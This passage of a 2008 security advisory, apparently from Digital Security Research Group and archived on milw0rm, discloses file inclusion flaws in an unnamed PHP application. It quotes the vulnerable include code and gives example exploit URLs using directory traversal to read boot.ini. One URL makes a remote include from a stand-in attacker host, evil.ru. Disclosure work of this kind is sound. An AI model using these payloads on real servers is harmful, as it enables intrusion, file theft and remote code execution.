################################################# Example: http://[server]/[installdir]/themes/blog/layouts/standard.php?page_include=http://evil.ru/evil.php http://[server]/[installdir]/themes/default/layouts/standard.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/themes/snazzy/layouts/standard.php?page=../../../../../../../../../../../../../boot.ini%00 Multiple Local File Include vulnerabilities: 2. Local File Include vulnerability found in script admin/lang/fr/reports/default.php Code **** ################################################# if(isset($_GET['t'])) { switch($_GET['t']) { case "forum": include("../admin/lang/".$lang."/reports/ops/forum.php"); break; case "download": include("../admin/lang/".$lang."/reports/ops/download.php"); break; case "news": include("../admin/lang/".$lang."/reports/ops/news.php"); break; } } else die("You cannot access this page directly"); ################################################# Example: http://[server]/[installdir]/admin/lang/fr/reports/default.php?t=news&lang=../../../../../../../../../../../../../boot.ini%00 3. Local File Include vulnerabilities found in scripts: admin/ops/admins/default.php admin/ops/reports/ops/download.php admin/ops/reports/ops/forum.php admin/ops/reports/ops/news.php Code **** ################################################# ... ################################################# Example: http://[server]/[installdir]/themes/blog/layouts/basic_footer.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 9. Local File Include vulnerabilities found in scripts: themes/blog/layouts/basic_header.php themes/default/layouts/basic_header.php themes/portfolio/layouts/basic_header.php themes/snazzy/layouts/basic_header.php Code **** ################################################# ... ... ################################################# Example: http://[server]/[installdir]/themes/default/layouts/basic_header.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 10. Local File Include vulnerabilities found in scripts: themes/blog/layouts/print.php themes/default/layouts/print.php themes/portfolio/layouts/print.php themes/snazzy/layouts/print.php Code **** ################################################# if(!isset($page_include)) { if($page_ck['custom'] == '0') include("./pages/".$page."/default/content.php"); else include("./pages/custom/".$page."/default/content.php"); } else include("./themes/".$theme_dir."/templates/".$page_include); include("./themes/".$theme_dir."/templates/footer.tpl"); ################################################# Example: http://[server]/[installdir]/themes/blog/layouts/print.php?page=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/themes/default/layouts/print.php?page_include=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/themes/portfolio/layouts/print.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 11. Local File Include vulnerabilities found in scripts: themes/blog/layouts/total.php themes/default/layouts/total.php themes/portfolio/layouts/total.php themes/snazzy/layouts/total.php Code **** ################################################# ################################################# Example: http://[server]/[installdir]/themes/default/layouts/total.php?theme_dir=../../../../../../../../../../../../../boot.ini%00 http://[server]/[installdir]/themes/snazzy/layouts/total.php?page=../../../../../../../../../../../../../boot.ini%00 About ***** Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact: research [at] dsec [dot] ru http://www.dsec.ru (in Russian) # milw0rm.com [2008-07-04]